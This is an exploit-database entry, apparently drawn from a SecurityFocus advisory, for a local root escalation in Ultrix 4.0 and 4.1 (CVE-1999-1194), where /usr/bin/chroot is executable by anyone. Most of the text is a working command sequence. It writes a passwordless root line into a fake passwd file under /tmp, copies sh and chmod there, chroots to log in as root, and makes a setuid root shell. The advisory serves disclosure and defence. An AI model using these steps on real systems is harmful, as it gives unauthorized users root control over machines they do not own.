source: http://www.securityfocus.com/bid/17/info By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges. $ mkdir /tmp/etc $ echo root::0:0::/:/bin/sh > /tmp/etc/passwd $ mkdir /tmp/bin $ cp /bin/sh /tmp/bin/sh $ cp /bin/chmod /tmp/bin/chmod $ chroot /tmp /bin/login Then login as root with no password. chmod /tmp/bin/sh to 4700, exit and run the suid /tmp/bin/sh.
Related ExploitsTrying to match CVEs (1): CVE-1999-1194
Trying to match OSVDBs (1): 885
Other Possible E-DB Search Terms: Digital Ultrix 4.0/4.1, Digital Ultrix 4.0, Digital Ultrix